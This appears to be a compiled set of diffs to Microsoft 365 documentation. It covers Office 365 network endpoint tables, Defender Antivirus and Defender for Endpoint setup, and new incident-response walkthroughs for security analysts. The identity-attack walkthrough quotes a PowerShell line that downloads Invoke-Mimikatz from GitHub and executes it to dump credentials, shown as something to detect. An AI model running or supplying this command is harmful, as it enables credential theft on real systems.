-77 | Allow<BR>Required | Yes | `portal.microsoftonline.com`<BR>`13.107.6.171/32, 13.107.140.6/32, 52.108.0.0/14, 52.238.106.116/32, 52.244.37.168/32, 52.244.203.72/32, 52.244.207.172/32, 52.244.223.198/32, 52.247.150.191/32, 2603:1010:2::cb/128, 2603:1010:200::c7/128, 2603:1020:200::682f:a0fd/128, 2603:1020:201:9::c6/128, 2603:1020:600::a1/128, 2603:1020:700::a2/128, 2603:1020:800:2::6/128, 2603:1020:900::8/128, 2603:1030:7::749/128, 2603:1030:800:5::bfee:ad3c/128, 2603:1030:f00::17/128, 2603:1030:1000::21a/128, 2603:1040:200::4f3/128, 2603:1040:401::762/128, 2603:1040:601::60f/128, 2603:1040:a01::1e/128, 2603:1040:c01::28/128, 2603:1040:e00:1::2f/128, 2603:1040:f00::1f/128, 2603:1050:1::cd/128, 2620:1ec:8fc::6/128, 2620:1ec:a92::171/128, 2a01:111:f100:2000::a83e:3019/128, 2a01:111:f100:2002::8975:2d79/128, 2a01:111:f100:2002::8975:2da8/128, 2a01:111:f100:7000::6fdd:6cd5/128, 2a01:111:f100:a004::bfeb:88cf/128` | **TCP:** 443
+75 | Default<BR>Optional<BR>**Notes:** Graph.windows.net, Office 365 Management Pack for Operations Manager, SecureScore, Azure AD Device Registration, Forms, StaffHub, Application Insights, captcha services | No | `*.hockeyapp.net, *.sharepointonline.com, cdn.forms.office.net, dc.applicationinsights.microsoft.com, dc.services.visualstudio.com, forms.microsoft.com, mem.gfx.ms, office365servicehealthcommunications.cloudapp.net, signup.microsoft.com, staffhub.ms, staffhub.uservoice.com, staffhubweb.azureedge.net, watson.telemetry.microsoft.com` | **TCP:** 443
78 | Default<BR>Optional<BR>**Notes:** Some Office 365 features require endpoints within these domains (including CDNs). Many specific FQDNs within these wildcards have been published recently as we work to either remove or better explain our guidance relating to these wildcards. | No | `*.microsoft.com, *.msocdn.com, *.office.net, *.onmicrosoft.com` | **TCP:** 443, 80 79 | Default<BR>Required | No | `o15.officeredir.microsoft.com, officepreviewredir.microsoft.com, officeredir.microsoft.com, r.office.microsoft.com` | **TCP:** 443, 80
-80 | Default<BR>Required | No | `ocws.officeapps.live.com` | **TCP:** 443
-81 | Default<BR>Required | No | `odc.officeapps.live.com` | **TCP:** 443, 80
82 | Default<BR>Required | No | `roaming.officeapps.live.com` | **TCP:** 443, 80 83 | Default<BR>Required | No | `activation.sls.microsoft.com` | **TCP:** 443 84 | Default<BR>Required | No | `crl.microsoft.com` | **TCP:** 443, 80
ID | Category | ER | Addresses | Ports
89 | Default<BR>Required | No | `go.microsoft.com, support.office.com` | **TCP:** 443, 80 91 | Default<BR>Required | No | `ajax.aspnetcdn.com` | **TCP:** 443, 80 92 | Default<BR>Required | No | `officecdn.microsoft.com, officecdn.microsoft.com.edgesuite.net` | **TCP:** 443, 80
-93 | Default<BR>Optional<BR>**Notes:** ProPlus: auxiliary URLs | No | `*.virtualearth.net, ajax.microsoft.com, c.bing.net, excelbingmap.firstpartyapps.oaspapps.com, excelcs.officeapps.live.com, ocos-office365-s2s.msedge.net, omextemplates.content.office.net, peoplegraph.firstpartyapps.oaspapps.com, pptcs.officeapps.live.com, tse1.mm.bing.net, uci.officeapps.live.com, watson.microsoft.com, wikipedia.firstpartyapps.oaspapps.com, wordcs.officeapps.live.com, www.bing.com` | **TCP:** 443, 80
+93 | Default<BR>Optional<BR>**Notes:** ProPlus: auxiliary URLs | No | `*.virtualearth.net, ajax.microsoft.com, c.bing.net, excelbingmap.firstpartyapps.oaspapps.com, ocos-office365-s2s.msedge.net, omextemplates.content.office.net, peoplegraph.firstpartyapps.oaspapps.com, tse1.mm.bing.net, watson.microsoft.com, wikipedia.firstpartyapps.oaspapps.com, www.bing.com` | **TCP:** 443, 80
95 | Default<BR>Optional<BR>**Notes:** Outlook for Android and iOS | No | `*.acompli.net, *.outlookmobile.com` | **TCP:** 443 96 | Default<BR>Optional<BR>**Notes:** Outlook for Android and iOS: Authentication | No | `*.manage.microsoft.com, api.office.com, go.microsoft.com, login.windows-ppe.net, secure.aadcdn.microsoftonline-p.com, vortex.data.microsoft.com` | **TCP:** 443 97 | Default<BR>Optional<BR>**Notes:** Outlook for Android and iOS: Consumer Outlook.com and OneDrive integration | No | `account.live.com, apis.live.net, auth.gfx.ms, login.live.com` | **TCP:** 443
ID | Category | ER | Addresses | Ports
128 | Default<BR>Required | No | `*.config.office.net, *.manage.microsoft.com` | **TCP:** 443 147 | Default<BR>Required | No | `*.office.com` | **TCP:** 443, 80 148 | Default<BR>Required | No | `cdnprod.myanalytics.microsoft.com, myanalytics.microsoft.com, myanalytics-gcc.microsoft.com` | **TCP:** 443, 80
-149 | Default<BR>Required | No | `workplaceanalytics.cdn.office.net, workplaceanalytics.office.com` | **TCP:** 443, 80
+149 | Default<BR>Required | No | `workplaceanalytics.cdn.office.net` | **TCP:** 443, 80
150 | Default<BR>Optional<BR>**Notes:** Blocking these endpoints will affect the ability to access the Office 365 ProPlus deployment and management features via the portal. | No | `*.officeconfig.msocdn.com` | **TCP:** 443 152 | Default<BR>Optional<BR>**Notes:** These endpoints enables the Office Scripts functionality in Office clients available through the Automate tab. This feature can also be disabled through the Office 365 Admin portal. | No | `*.microsoftusercontent.com` | **TCP:** 443 153 | Default<BR>Required | No | `*.azure-apim.net, *.flow.microsoft.com, *.powerapps.com` | **TCP:** 443 156 | Default<BR>Required | No | `activity.windows.com` | **TCP:** 443 157 | Default<BR>Required | No | `ocsp.int-x3.letsencrypt.org` | **TCP:** 80
+158 | Default<BR>Required | No | `*.cortana.ai` | **TCP:** 443
+159 | Default<BR>Required | No | `admin.microsoft.com, portal.microsoftonline.com, portal.office.com` | **TCP:** 443, 80
+160 | Default<BR>Required | No | `cdn.odc.officeapps.live.com, cdn.uci.officeapps.live.com` | **TCP:** 443, 80
knowledge Topic Experiences Security Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/knowledge/topic-experiences-security-privacy.md
The following table describes what users - topic viewers, contributors, and know
## Best practices
-Topics presents information to users based on their existing permissions to content. Microsoft 365 provides a variety of ways to ensure that sensitive content is restricted to appropriate users. Beyond standard team or site permissions, you can use [sensitivity labels](../compliance/sensitivity-labels.md) or [data loss prevention](../compliance/data-loss-prevention-policies.md) to restrict access to content and [access reviews](/azure/active-directory/governance/access-reviews-overview) to periodically review user access to sensitive information.
+Topics presents information to users based on their existing permissions to content. Microsoft 365 provides a variety of ways to ensure that sensitive content is restricted to appropriate users. Beyond standard team or site permissions, you can use [sensitivity labels](../compliance/sensitivity-labels.md) or [data loss prevention](../compliance/dlp-learn-about-dlp.md) to restrict access to content and [access reviews](/azure/active-directory/governance/access-reviews-overview) to periodically review user access to sensitive information.
We recommend that you use these tools to ensure that your content permissions are set appropriately inside your organization. Topic experiences can then provide useful and appropriate information to your users.
security Enable Cloud Protection Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus.md
ms.sitesec: library
localization_priority: normal Previously updated : 11/13/2020 Last updated : 04/30/2021
Microsoft Defender Antivirus uses multiple detection and prevention technologies
You can turn Microsoft Defender Antivirus cloud-delivered protection on or off in several ways: - Microsoft Intune-- Microsoft Endpoint Configuration Manager
+- Microsoft Endpoint Manager
- Group Policy - PowerShell cmdlets.
For more information about the specific network-connectivity requirements to ens
## Use Intune to turn on cloud-delivered protection 1. Go to the Microsoft Endpoint Manager admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and log in.+ 2. On the **Home** pane, select **Device configuration > Profiles**.+ 3. Select the **Device restrictions** profile type you want to configure. If you need to create a new **Device restrictions** profile type, see [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure).+ 4. Select **Properties** > **Configuration settings: Edit** > **Microsoft Defender Antivirus**.+ 5. On the **Cloud-delivered protection** switch, select **Enable**.+ 6. In the **Prompt users before sample submission** dropdown, select **Send all data automatically**. For more information about Intune device profiles, including how to create and configure their settings, see [What are Microsoft Intune device profiles?](/intune/device-profiles)
For more information about Intune device profiles, including how to create and c
## Use Microsoft Endpoint Manager to turn on cloud-delivered protection 1. Go to the Microsoft Endpoint Manager admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and log in.+ 2. Choose **Endpoint security** > **Antivirus**.+ 3. Select an antivirus profile. (If you don't have one yet, or if you want to create a new profile, see [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure).+ 4. Select **Properties**. Then, next to **Configuration settings**, choose **Edit**.+ 5. Expand **Cloud protection**, and then in the **Cloud-delivered protection level** list, select one of the following:
- 1. **High**: Applies a strong level of detection.
- 2. **High plus**: Uses the **High** level and applies additional protection measures (may impact client performance).
- 3. **Zero tolerance**: Blocks all unknown executables.
+ - **High**: Applies a strong level of detection.
+ - **High plus**: Uses the **High** level and applies additional protection measures (may impact client performance).
+ - **Zero tolerance**: Blocks all unknown executables.
+ 6. Select **Review + save**, then choose **Save**. For more information about configuring Microsoft Endpoint Configuration Manager, see [How to create and deploy antimalware policies: Cloud-protection service](/configmgr/protect/deploy-use/endpoint-antimalware-policies#cloud-protection-service).
For more information about configuring Microsoft Endpoint Configuration Manager,
>[!NOTE] > The **Send safe samples** (1) option means that most samples will be sent automatically. Files that are likely to contain personal information will still prompt and require additional confirmation.-
- > [!WARNING]
> Setting the option to **Always Prompt** (0) will lower the protection state of the device. Setting it to **Never send** (2) means that the [Block at First Sight](configure-block-at-first-sight-microsoft-defender-antivirus.md) feature of Microsoft Defender for Endpoint won't work. 7. Select **OK**.
For more information about allowed parameters, see [Windows Defender WMIv2 APIs]
- [Defender cmdlets](/powershell/module/defender/) - [Use Microsoft cloud-delivered protection in Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md) - [How to create and deploy antimalware policies: Cloud-protection service](/configmgr/protect/deploy-use/endpoint-antimalware-policies#cloud-protection-service)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
+- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Linux Install With Ansible https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-ansible.md
Before you get started, see [the main Defender for Endpoint on Linux page](micro
In addition, for Ansible deployment, you need to be familiar with Ansible administration tasks, have Ansible configured, and know how to deploy playbooks and tasks. Ansible has many ways to complete the same task. These instructions assume availability of supported Ansible modules, such as *apt* and *unarchive* to help deploy the package. Your organization might use a different workflow. Refer to the [Ansible documentation](https://docs.ansible.com/) for details. -- Ansible needs to be installed on at least one computer (we will call it the primary computer).-- SSH must be configured for an administrator account between the primary computer and all clients, and it is recommended be configured with public key authentication.-- The following software must be installed on all clients:
+- Ansible needs to be installed on at least one computer (Ansible calls this the control node).
+- SSH must be configured for an administrator account between the control node and all managed nodes (devices that will have Defender for Endpoint installed on them), and it is recommended to be configured with public key authentication.
+- The following software must be installed on all managed nodes:
- curl - python-apt -- All hosts must be listed in the following format in the `/etc/ansible/hosts` or relevant file:
+- All managed nodes must be listed in the following format in the `/etc/ansible/hosts` or relevant file:
```bash [servers]
security Microsoft Defender Endpoint Android https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-android.md
This topic describes how to install, configure, update, and use Defender for End
- Access [Microsoft Endpoint Manager admin center](https://go.microsoft.com/fwlink/?linkid=2109431), to deploy the app to enrolled user groups in your organization.
+
+###Network Requirements
+- For Microsoft Defender for Endpoint on Android to function when connected to a network the firewall/proxy will need to be configured to [enable access to Microsoft Defender for Endpoint service URLs](configure-proxy-internet.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server)
+-
### System Requirements - Android devices running Android 6.0 and above.
security Microsoft Defender Endpoint Ios https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-ios.md
iOS devices along with other platforms.
- Access to [Microsoft Endpoint Manager admin center](https://go.microsoft.com/fwlink/?linkid=2109431), to deploy the app to enrolled user groups in your organization.
+**Network Requirements**
+- For Microsoft Defender for Endpoint on iOS to function when connected to a network the firewall/proxy will need to be configured to [enable access to Microsoft Defender for Endpoint service URLs](configure-proxy-internet.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server)
+ **System Requirements** - iOS devices running iOS 11.0 and above. iPad devices are officially supported from version 1.1.15010101 onward.
security Api Update Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-update-incidents.md
In the request body, supply the values for the fields that should be updated. Ex
Property | Type | Description -|-|-
-status | Enum | Specifies the current status of the alert. Possible values are: ```Active```, ```Resolved```, and ```Redirected```.
+status | Enum | Specifies the current status of the incident. Possible values are: ```Active```, ```Resolved```, and ```Redirected```.
assignedTo | string | Owner of the incident.
-classification | Enum | Specification of the alert. Possible values are: ```Unknown```, ```FalsePositive```, ```TruePositive```.
-determination | Enum | Specifies the determination of the alert. Possible values are: ```NotAvailable```, ```Apt```, ```Malware```, ```SecurityPersonnel```, ```SecurityTesting```, ```UnwantedSoftware```, ```Other```.
+classification | Enum | Specification of the incident. Possible values are: ```Unknown```, ```FalsePositive```, ```TruePositive```.
+determination | Enum | Specifies the determination of the incident. Possible values are: ```NotAvailable```, ```Apt```, ```Malware```, ```SecurityPersonnel```, ```SecurityTesting```, ```UnwantedSoftware```, ```Other```.
tags | string List | List of Incident tags. ## Response
security First Incident Analyze https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-analyze.md
+
+ Title: Step 1. Triage and analyze your first incident
+description: How to triage and begin the analysis of your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Step 1. Triage and analyze your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+As you spend some time establishing, implementing, and maintaining security measures according to the organizationΓÇÖs standards, you can set up security solutions to help you quickly identify security risks and threats. Microsoft 365 Defender allows you to detect, triage, and investigate incidents through its single-pane-of-glass experience where you can find the information you need to make timely decisions.
+
+Once a security incident is detected, Microsoft 365 Defender presents details you will need to triage or prioritize an incident or incidents over others. After determining prioritization, analysts can then focus their energy on investigating cases assigned to them.
+
+## Detection by Microsoft 365 Defender
+
+Microsoft 365 Defender receives alerts and events from multiple Microsoft security platforms as detection sources to create a holistic picture and context of malicious activity. These are the possible detection sources:
+
+- [Microsoft Defender for Endpoint](../defender-endpoint/microsoft-defender-endpoint.md) is an endpoint detection and response solution (EDR) that uses Microsoft Defender antivirus as well as cloud-enabled advanced threat protection using Microsoft Security Graph. Defender for Endpoint is a unified platform for preventative protection, post-breach detection, automated investigation, and response. It protects endpoints from cyberthreats, detects advanced attacks and data breaches, automates security incidents, and improves security posture.
+- [Microsoft Defender for Identity](https://docs.microsoft.com/defender-for-identity/what-is) is a cloud-based security solution that uses your on-premises Active Directory Domain Services (AD DS) signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization.
+- [Microsoft Cloud App Security](https://docs.microsoft.com/cloud-app-security/) acts as a gatekeeper to broker access in real time between your enterprise users and the cloud resources they use, wherever your users are located and regardless of the device they are using.
+- [Microsoft Defender for Office 365](../office-365-security/overview.md) safeguards your organization against malicious threats in email messages, links (URLs), and collaboration tools.
+- [Azure Security Center](https://docs.microsoft.com/azure/security-center/security-center-introduction) is a unified infrastructure security management system that strengthens the security posture of your data centers and provides advanced threat protection across your hybrid workloads in the cloud as well as on premises.
+
+In Microsoft 365 Defender, [incidents](incidents-overview.md) are identified by correlating alerts from these different detection sources. Instead of spending resources stringing together or distinguishing multiple alerts into their respective incidents, you can start with the incident queue in Microsoft 365 Defender right away. This allows you to triage incidents in an efficient manner across endpoints, identities, email, and applications, and reduce the damage from an attack.
+
+## Triage your incidents
+
+Incident response in Microsoft 365 Defender starts once you triage the list of incidents using your organizationΓÇÖs recommended method of prioritization. To triage means to assign a level of importance or urgency to incidents, which then determines the order in which they will be investigated.
+
+A useful sample guide for determining which incident to prioritize in Microsoft 365 Defender can be summarized by the formula: *Severity + Impact = Priority*.
+
+- **Severity** is the level designated by Microsoft 365 Defender and its integrated security components.
+- **Impact** is determined by the organization and generally includes, but not limited to, a threshold number of impacted users, devices, services affected (or a combination thereof), and even alert type.
+
+Analysts then initiate investigations based on the **Priority** criteria set by the organization.
+
+Incident prioritization might vary depending on the organization. NIST recommends also considering the functional and informational impact of the incident, and recoverability.
+
+The following is just one approach to triage:
+
+1. Go to the [incidents](incidents-overview.md) page to initiate triage. Here you can see a list of incidents affecting your organization. By default, they are arranged from the most recent to the oldest incident. From here, you can also see different columns for each incident showing their severity, category, number of active alerts, and impacted entities, among others. You can customize the set of columns and sort the incident queue by some these columns by selecting the column name. You can also filter the incident queue according to your needs. For a full list of available filters, see [Prioritize incidents](incident-queue.md#available-filters).
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-queue.png" alt-text="Example of the incident queue":::
+
+ One example of how you might perform triage for this set of incidents is to prioritize incidents that affected more users and devices. In this example, you might prioritize incident ID 6769 because it affected the largest number of entities: 7 devices, 6 users, and 2 mailboxes. Furthermore, the incident appears to contain alerts from Microsoft Defender for Identity which indicate an identity-based alert and possible credential theft.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-high-impact.png" alt-text="Example of a high-impact incident":::
+
+2. Select the circle next to the incident name to review the details. A side pane will appear on the right side, which contains additional information that can assist your triage further.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-incident-flyout.png" alt-text="Example of an incident side pane":::
+
+ For example, by looking at which [MITRE ATT&CK](https://attack.mitre.org/) tactics the attacker used based on the incidentΓÇÖs categories, you might prioritize this incident because the attacker used stolen credentials, established command and control, performed lateral movement, and exfiltrated some data. This suggests the attacker has already gone deep into the network and possibly stolen confidential information.
+
+ Additionally, if your organization has implemented the Zero Trust framework, you would consider credential access as an important security violation worth prioritizing.
+
+ Scrolling down the side pane, you will see the specific impacted entities such as users, devices, and mailboxes. You can check the exposure level of each device and the owners of affected mailboxes.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-incident-flyout-details.png" alt-text="Example of an incident side pane details":::
+
+3. Further down the side pane, you can find the associated alerts. Microsoft 365 Defender has already performed the correlation of said alerts into a single incident, saving you time and resources better spent remediating the attack. Alerts are suspicious and therefore possibly malicious system events that suggest the presence of an attacker on a network.
+
+ In this example, 87 individual alerts were determined to be part of one security incident. You can view all the alerts to get a quick view of how the attack played out.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-incident-flyout-alerts.png" alt-text="Example of alerts in an incident side pane":::
+
+## Analyze your first incident
+
+Understanding the context surrounding alerts is equally important. Often an alert is not a single independent event. There is a chain of processes created, commands, and actions that might not have occurred at the same time. Therefore, an analyst must look for the first and last activities of the suspicious entity in device timelines to understand the context of the alerts.
+
+There are multiple ways to read and analyze data using Microsoft 365 Defender but the end goal for analysts is to respond to incidents as quickly as possible. While Microsoft 365 Defender can significantly reduce [Mean Time to Remediate (MTTR)](https://www.microsoft.com/security/blog/2020/05/04/lessons-learned-microsoft-soc-part-3c/) through the industry-leading Auto-Remediation feature, there are always cases that require manual analysis.
+
+Here's an example:
+
+1. Once triage priority has been determined, an analyst begins an in-depth analysis by selecting the incident name. This page brings up the **Incident Summary** where data is displayed in tabs to assist with the analysis. Under the **Alerts** tab the type of alerts are displayed. Analysts can click on each alert to drill down into the respective detection source.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-summary-tab.png" alt-text="Example of the Summary tab of an incident":::
+
+ For a quick guide about which domain each detection source covers, review the [Detect](#detection-by-microsoft-365-defender) section of this article.
+
+2. From the **Alerts** tab, an analyst can pivot to the detection source to conduct a more in-depth investigation and analysis. For example, selecting Malware Detection with Microsoft Cloud App Security as the detection source takes the analyst to its corresponding alert page.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-select-alert.png" alt-text="Example of selecting an alert of an incident":::
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-link-to-mcas.png" alt-text="Example of a corresponding page in Microsoft Cloud App Security":::
+
+3. To investigate our example further, scrolling to the bottom of the page to view the **Users affected**. To see the activity and context surrounding the malware detection, select Annette HillΓÇÖs user page .
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-user-page.png" alt-text="Example of a user page":::
+
+4. On the user page is a chronological list of events starting with a *Risky Sign-in from a TOR network IP Address* alert. While the suspiciousness of an activity depends on the nature of how an organization conducts its business, in most cases the use of The Onion Router (TOR), a network that allows users to browse the web anonymously, in an enterprise environment might be considered highly unlikely and unnecessary for regular online operations.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-user-event-list.png" alt-text="Example of the chronological list of events for a user":::
+
+5. Each alert can be selected to obtain more information on the activity. For example, selecting **Activity from a Tor IP Address** alert leads you to that alertΓÇÖs own page. Annette is an Administrator of Office 365, which means she has elevated privileges and the source incident might have led to access to confidential information.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-mcas-alert.png" alt-text="Example of alerts details for Microsoft Cloud App Security ":::
+
+6. By selecting other alerts, an analyst can get a complete picture of the attack.
+
+## Next step
+
+[![Step 2: Learn how to remediate incidents](../../medi)
+
+Learn how to [remediate incidents](first-incident-remediate.md).
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
security First Incident Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-overview.md
+
+ Title: Introduction to responding to your first incident
+description: The basics of responding to your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Introduction to responding to your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+An organization's incident response strategy determines its ability to deal with increasingly disruptive security incidents and cybercrime. While taking preventative measures is important, the ability to act quickly to contain, eradicate, and recover from detected incidents can minimize damage and business losses.
+
+This incident response walkthrough shows how you, as part of a security operations team, can perform most of the key incident response steps within Microsoft 365 Defender. Here are the steps:
+
+- Preparation of your security posture
+- For each incident:
+ - Step 1: Triage and analysis
+ - Step 2: Remediation (containment, eradication, and recovery)
+ - Step 3: Post-incident review
+
+A security incident is defined by National Institute of Standards and Technology (NIST) as "an occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system; or the information the system processes, stores, or transmits; or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies."
+
+Incidents in Microsoft 365 Defender are the logical starting points for analysis and incident response. Analyzing and remediating incidents typically makes up most of a security operations team's tasks.
+
+## Next step
+
+[![Prepare your organization and Microsoft 365 tenant](../../medi)
+
+Make sure your organization and Microsoft 365 tenant is [prepared for incident handling](first-incident-prepare.md).
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
security First Incident Path Identity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-path-identity.md
+
+ Title: Example of an identity-based attack
+description: Step through an example analysis of an identity-based attack.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Example of an identity-based attack
++
+**Applies to:**
+- Microsoft 365 Defender
+
+Microsoft Defender for Identity can help detect malicious attempts to compromise identities in your organization. Because Defender for Identity integrates with Microsoft 365 Defender, security analysts can have visibility on threats coming in from Defender for Identity, such as suspected Netlogon privilege elevation attempts.
+
+## Analyzing the attack in Microsoft Defender for Identity
+
+Microsoft 365 Defender allows analysts to filter alerts by detection source on the **Alerts** tab of the incidents page. In the following example, the detection source is filtered to **Defender for Identity**.
++
+Selecting the **Suspected overpass-the-hash attack** alert goes to a page in Microsoft Cloud App Security that displays more detailed information. You can always find out more about an alert or attack by selecting **Learn more about this alert type** to read a [description of the attack](https://docs.microsoft.com/defender-for-identity/lateral-movement-alerts#suspected-overpass-the-hash-attack-kerberos-external-id-2002) as well as remediation suggestions.
+
+
+## Investigating the same attack in Microsoft Defender for Endpoint
+
+Alternatively, an analyst can use Defender for Endpoint to learn more about the activity on an endpoint. Select the incident from the incident queue, then select the **Alerts** tab. From here, they can identify the detection source as well. A detection source labeled as EDR stands for Endpoint Detection and Response, which is Defender for Endpoint. From here, the analyst select an alert detected by EDR.
++
+The alert page displays various pertinent information such as the impacted device name, username, status of auto-investigation, and the alert details. The alert story depicts a visual representation of the process tree. The process tree is a hierarchical representation of parent and child processes related to the alert.
++
+Each process can be expanded to view additional details. Details that an analyst can see are the actual commands that were entered as part of a malicious script, outbound connection IP addresses, and other useful information.
+
+
+By selecting **See in timeline**, an analyst can drill down even further to determine the exact time of the compromise.
+
+Microsoft Defender for Endpoint can detect many malicious files and scripts. However, due to many legitimate uses for outbound connections, PowerShell, and command-line activity, some activity would be considered benign until it creates a malicious file or activity. Therefore, using the timeline helps analysts to put the alert into context with the surrounding activity to determine the original source or time of the attack that otherwise is obscured by common file system and user activity.
+
+To do this, an analyst would start at the time of the alert detection (in red) and scroll down backwards in time to determine when the original activity that led to the malicious activity actually started.
++
+It is important to understand and distinguish common activity such as Windows Update connections, Windows Trusted Software activation traffic, other common connections to Microsoft sites, third-party Internet activity, Microsoft Endpoint Configuration Manager activity, and other benign activity from suspicious activity. One way to accomplish this is by using timeline filters. There are many filters that can highlight specific activity while filtering out anything that the analyst does not want to view.
+
+In the image below, the analyst filtered to view only network and process events. This allows the analyst to see the network connections and processes surrounding the event where Notepad established a connection with an IP address, which we also saw in the process tree.
++
+In this particular event, Notepad was used to make a malicious outbound connection. However, often attackers will simply use iexplorer.exe to establish connections to download a malicious payload because ordinarily iexplorer.exe processes are considered regular web browser activity.
+
+Another item to look for in the timeline would be PowerShell uses for outbound connections. The analyst would look for successful PowerShell connections with commands such as `IEX (New-Object Net.Webclient)` followed by an outbound connection to a website hosting a malicious file.
+
+In the following example, PowerShell was used to download and execute Mimikatz from a website:
+
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
+```
+An analyst can quickly search for keywords by typing in the keyword in the search bar to display only events created with PowerShell.
+
+## Next step
+
+See the [phishing](first-incident-path-phishing.md) investigation path.
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Manage incidents](manage-incidents.md)
+- [Analyze incidents](investigate-incidents.md)
security First Incident Path Phishing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-path-phishing.md
+
+ Title: Example of a phishing email attack
+description: Step through an example analysis of an phishing attack.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Example of a phishing email attack
++
+**Applies to:**
+- Microsoft 365 Defender
+
+Microsoft 365 Defender can help detect malicious attachments delivered via email. Since the [Office 365 Security and Compliance Center](https://protection.office.com/) integrates with Microsoft 365 Defender, security analysts can have visibility on threats coming in from Office 365, such as through email attachments.
+
+For example, an analyst was assigned a multi-stage incident.
+
+
+In the **Alerts** tab of the incident, alerts from Defender for Office 365 and Microsoft Cloud App Security are displayed. The analyst can drill down into the Defender for Office 365 alerts by selecting the email messages alerts. The details of the alert are displayed on the side pane.
+
+
+By scrolling down further, more information is displayed, showing the malicious files and user that was impacted.
+
+
+Selecting **Open alert page** takes you to the specific alert where various information can be viewed in greater detail by selecting the link. The actual email message can be viewed by selecting **View messages in Explorer** toward the bottom of the panel.
+
+
+This takes the analyst to the Threat Management page where the email Subject, Recipient, Sender, and other information are displayed. **ZAP** under **Special Actions** tells the analyst that the Zero-hour auto purge feature was implemented. ZAP automatically detects and removes malicious and spam messages from mailboxes across the organization. For more information, see [Zero-hour auto purge (ZAP) in Exchange Online](../office-365-security/zero-hour-auto-purge.md).
+
+Other actions can be taken on specific messages by selecting **Actions**.
+
+
+## Next step
+
+See the [identity-based attack](first-incident-path-identity.md) investigation path.
+
+## See also
+
